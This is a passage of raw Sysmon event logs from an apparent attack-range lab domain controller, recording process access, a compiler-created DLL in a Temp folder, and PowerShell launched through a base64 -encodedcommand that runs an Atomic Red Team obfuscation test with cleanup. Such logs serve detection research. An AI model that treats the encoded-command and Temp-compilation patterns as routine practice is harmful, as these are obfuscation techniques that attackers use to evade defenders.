C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5534,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5535,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5536,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5537,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010149B0A00}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010149B0A00}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5538,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:47.781\r\nProcessGuid: {A837DB8D-032F-5F25-0000-00108C970A00}\r\nProcessId: 2856\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.dll\r\nCreationUtcTime: 2020-08-01 05:52:47.703","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:47.781","ProcessGuid":"{A837DB8D-032F-5F25-0000-00108C970A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.dll","CreationUtcTime":"2020-08-01 05:52:47.703","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5539,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.251\r\nProcessGuid: {A837DB8D-0330-5F25-0000-0010F49C0A00}\r\nProcessId: 5052\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {} \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nParentProcessId: 3088\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.251","ProcessGuid":"{A837DB8D-0330-5F25-0000-0010F49C0A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {} ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","ParentProcessId":"3088","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5540,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010F49C0A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e334ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97eb5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e2c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e5037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e61366(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","SourceProcessId":"3088","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010F49C0A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Au